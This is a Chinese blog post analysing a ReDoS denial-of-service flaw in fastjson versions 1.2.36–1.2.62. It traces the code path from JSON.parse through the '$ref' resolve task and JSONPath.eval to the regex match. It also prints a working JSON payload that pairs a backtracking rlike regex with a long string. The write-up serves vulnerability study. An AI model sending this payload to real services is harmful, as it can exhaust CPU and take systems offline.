<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="无意翻到b1ue大佬挖 fastjson 的拒绝服务漏洞的文章，影响范围 1.2.36~1.2.62 ，于是跟了一下漏洞原理和触发流程，按照自己的理解简单地从结果出发开始分析。 以下复现均是在1.2.62">
<meta property="og:type" content="article">
<meta property="og:title" content="fastjson reDOS 简单分析">
<meta property="og:url" content="http://yoursite.com/2020/04/07/fastjson-reDOS-简单分析/index.html">
<meta property="og:site_name" content="Eight Dimensions">
<meta property="og:description" content="无意翻到b1ue大佬挖 fastjson 的拒绝服务漏洞的文章，影响范围 1.2.36~1.2.62 ，于是跟了一下漏洞原理和触发流程，按照自己的理解简单地从结果出发开始分析。 以下复现均是在1.2.62">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/2020/04/07/fastjson-reDOS-简单分析/image-20200326175729810.png">
<meta property="og:image" content="http://yoursite.com/2020/04/07/fastjson-reDOS-简单分析/image-20200326202606582.png">
<meta property="og:image" content="http://yoursite.com/2020/04/07/fastjson-reDOS-简单分析/image-20200326204335856.png">
<meta property="og:image" content="http://yoursite.com/2020/04/07/fastjson-reDOS-简单分析/image-20200327004101370.png">
<meta property="og:image" content="http://yoursite.com/2020/04/07/fastjson-reDOS-简单分析/image-20200327005354458.png">
<meta property="og:image" content="http://yoursite.com/2020/04/07/fastjson-reDOS-简单分析/image-20200327010042096.png">
<meta property="og:updated_time" content="2020-04-07T13:39:38.733Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="fastjson reDOS 简单分析">
<meta name="twitter:description" content="无意翻到b1ue大佬挖 fastjson 的拒绝服务漏洞的文章，影响范围 1.2.36~1.2.62 ，于是跟了一下漏洞原理和触发流程，按照自己的理解简单地从结果出发开始分析。 以下复现均是在1.2.62">
<meta name="twitter:image" content="http://yoursite.com/2020/04/07/fastjson-reDOS-简单分析/image-20200326175729810.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/04/07/fastjson-reDOS-简单分析/">





  <title>fastjson reDOS 简单分析 | Eight Dimensions</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Eight Dimensions</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/04/07/fastjson-reDOS-简单分析/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Shad0w">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Eight Dimensions">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">fastjson reDOS 简单分析</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-04-07T21:36:31+08:00">
                2020-04-07
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>无意翻到b1ue大佬挖 fastjson 的拒绝服务漏洞的文章，影响范围 1.2.36~1.2.62 ，于是跟了一下漏洞原理和触发流程，按照自己的理解简单地从结果出发开始分析。</p>
<p>以下复现均是在1.2.62</p>
<a id="more"></a>



<h2 id="漏洞缘由"><a href="#漏洞缘由" class="headerlink" title="漏洞缘由"></a>漏洞缘由</h2><p>首先要说明的这是一个正则DOS引起的拒绝服务，最根本的原理如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">String p = <span class="string">"^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$"</span>;</span><br><span class="line">String strPropertyValue = <span class="string">"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"</span>;</span><br><span class="line">Pattern pattern = Pattern.compile(p);</span><br><span class="line">Matcher m = pattern.matcher(strPropertyValue);</span><br><span class="line"><span class="keyword">boolean</span> match = m.matches();</span><br></pre></td></tr></table></figure>

<p>接着看一下 fastjson 中如何使用到正则，fastjson 1.2.0 之后的版本支持 JSONPath ，可以在java框架中当作对象查询语言（OQL）来使用。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Object body = JSONPath.eval(<span class="string">"&#123;\"html\": &#123;\"body\": \"bob\"&#125;&#125;"</span>, <span class="string">"$.html['body']"</span>);</span><br><span class="line">System.out.println(body);</span><br><span class="line"><span class="comment">//result: bob</span></span><br></pre></td></tr></table></figure>

<p>JSONPath 匹配中可使用正则表达式，看到官方文档有如下说明：</p>
<table>
<thead>
<tr>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>[key like ‘aa%’]</td>
<td>字符串类型like过滤， 例如$.departs[name like ‘sz*’]，通配符只支持% 支持not like</td>
</tr>
<tr>
<td>[key rlike ‘regexpr’]</td>
<td>字符串类型正则匹配过滤， 例如departs[name like ‘aa(.)*’]， 正则语法为jdk的正则语法，支持not rlike</td>
</tr>
</tbody></table>
<p>因此如果传入的正则表达式可控可能会导致拒绝服务</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Object result = JSONPath.eval(<span class="string">"&#123;\"dos\":\"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!\"&#125;"</span>, <span class="string">"[dos rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"</span>);</span><br><span class="line">System.out.println(result);</span><br></pre></td></tr></table></figure>

<h2 id="JSON-parse-到-JSONPath-eval"><a href="#JSON-parse-到-JSONPath-eval" class="headerlink" title="JSON.parse 到 JSONPath.eval"></a>JSON.parse 到 JSONPath.eval</h2><p>如果是使用了 JSONPath 的 rlike 实现正则表达式的匹配，那么只要正则表达式可控就直接导致拒绝服务。但是现实项目业务逻辑中很少会直接使用 JSONPath 这个模块，更别说传入的正则表达式可控了。因此需要在常规的JSON.parse 中找到一个JSONPath的调用链。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">String json = <span class="string">""</span>;</span><br><span class="line">Object parse = JSON.parse(json);</span><br></pre></td></tr></table></figure>

<p>JSON#parse函数里主要涉及三个函数，DefaultJSONParser初始化会把整个字符串进行JSON对象的转换，而parse会进入 <code>DefaultJSONParser#parseObject</code> 处理JSON对象。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">DefaultJSONParser parser = <span class="keyword">new</span> DefaultJSONParser(text, config, features);</span><br><span class="line">Object value = parser.parse();</span><br><span class="line">parser.handleResovleTask(value);</span><br></pre></td></tr></table></figure>

<p> <code>DefaultJSONParser.java</code> 中搜索关键词 <code>JSONPath.eval</code></p>
<p><img src="image-20200326175729810.png" alt="image-20200326175729810"></p>
<p>找到 <code>DefaultJSONParser#handleResovleTask</code> 函数中调用了 <code>JSONPath.eval(value, ref)</code></p>
<p>value 参数是参数传入的，ref 是从 resolveTaskList 中获取，与此相关的是比较重要的就是 <code>addResolveTask</code></p>
<p><img src="image-20200326202606582.png" alt="image-20200326202606582"></p>
<p>搜索 addResolveTask 接着就跟到了 <code>DefaultJSONParser#parseObject</code> 399行</p>
<p><img src="image-20200326204335856.png" alt="image-20200326204335856"></p>
<p>可以看到当满足 <code>key == &quot;$ref&quot; 、ref 不等于&quot;@&quot;、&quot;..&quot;、&quot;$&quot;</code>  直接进入了这个 <code>else</code> 分支， ref原封不动的装进了ResolveTask。</p>
<p>再回过去看到第一个图片，ref 第一个字符需要为 <code>$</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (ref.startsWith(<span class="string">"$"</span>)) &#123;</span><br><span class="line">    refValue = getObject(ref);</span><br><span class="line">    <span class="keyword">if</span> (refValue == <span class="keyword">null</span>) &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            refValue = JSONPath.eval(value, ref);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (JSONPathException ex) &#123;</span><br><span class="line">            <span class="comment">// skip</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>到这里已经可以推出payload（出自<a href="*https://b1ue.cn/archives/314.html*">b1ue</a>）</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    <span class="attr">"regex"</span>:&#123;</span><br><span class="line">        <span class="attr">"$ref"</span>:<span class="string">"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"</span></span><br><span class="line">    &#125;,</span><br><span class="line">    <span class="attr">"blue"</span>:<span class="string">"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="JSONPath-eval-到-Matcher-matches"><a href="#JSONPath-eval-到-Matcher-matches" class="headerlink" title="JSONPath.eval 到 Matcher.matches"></a>JSONPath.eval 到 Matcher.matches</h2><p>从 matches 出发找到触发点 <code>JSONPath#RlikeSegement</code> apply方法</p>
<p><img src="image-20200327004101370.png" alt="image-20200327004101370"></p>
<p>而 RlikeSegement 的创建是通过判断传入的 <code>Path</code> 字符串是否有 <code>rlike</code> 的OP值</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Filter filter = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">if</span> (op == Operator.RLIKE) &#123;</span><br><span class="line">	filter = <span class="keyword">new</span> RlikeSegement(propertyName, strValue, <span class="keyword">false</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (op == Operator.NOT_RLIKE) &#123;</span><br><span class="line">	filter = <span class="keyword">new</span> RlikeSegement(propertyName, strValue, <span class="keyword">true</span>);</span><br></pre></td></tr></table></figure>

<p>回过头来看一下 <code>JSONPath.eval()</code> 的具体流程</p>
<p><img src="image-20200327005354458.png" alt="image-20200327005354458"></p>
<p>其中 segment.eval 有许多实现方法，但因为 RlikeSegement 是实现了 Filter 接口的类，因此 RlikeSegement 调用的是 <code>FilterSegment#eval</code> ，可以看到这里调用了 <code>filter.apply</code> 对应了 <code>RlikeSegement#apply</code></p>
<p><img src="image-20200327010042096.png" alt="image-20200327010042096"></p>
<p>其实可能大部分内容都和b1ue大佬写的差不多，只是这里按照自己的理解从结果“反推”的方式大致分析这个拒绝服务漏洞。当然整个过程其中很多参数提取、变化等细节是需要亲自的调试琢磨的，有兴趣也可以看看b1ue原文分析是怎么挖掘到这个漏洞。</p>
<h2 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h2><p><em><a href="https://b1ue.cn/archives/314.html" target="_blank" rel="noopener">https://b1ue.cn/archives/314.html</a></em></p>
<p><a href="https://github.com/alibaba/fastjson/wiki/JSONPath" target="_blank" rel="noopener">https://github.com/alibaba/fastjson/wiki/JSONPath</a></p>
<p><a href="https://www.cnblogs.com/exmyth/p/9839363.html" target="_blank" rel="noopener">https://www.cnblogs.com/exmyth/p/9839363.html</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/10/Linux常见提权问题/" rel="next" title="Linux常见提权问题">
                <i class="fa fa-chevron-left"></i> Linux常见提权问题
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Shad0w</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/PeteLing" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞缘由"><span class="nav-number">1.</span> <span class="nav-text">漏洞缘由</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#JSON-parse-到-JSONPath-eval"><span class="nav-number">2.</span> <span class="nav-text">JSON.parse 到 JSONPath.eval</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#JSONPath-eval-到-Matcher-matches"><span class="nav-number">3.</span> <span class="nav-text">JSONPath.eval 到 Matcher.matches</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考文章"><span class="nav-number">4.</span> <span class="nav-text">参考文章</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Shad0w</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
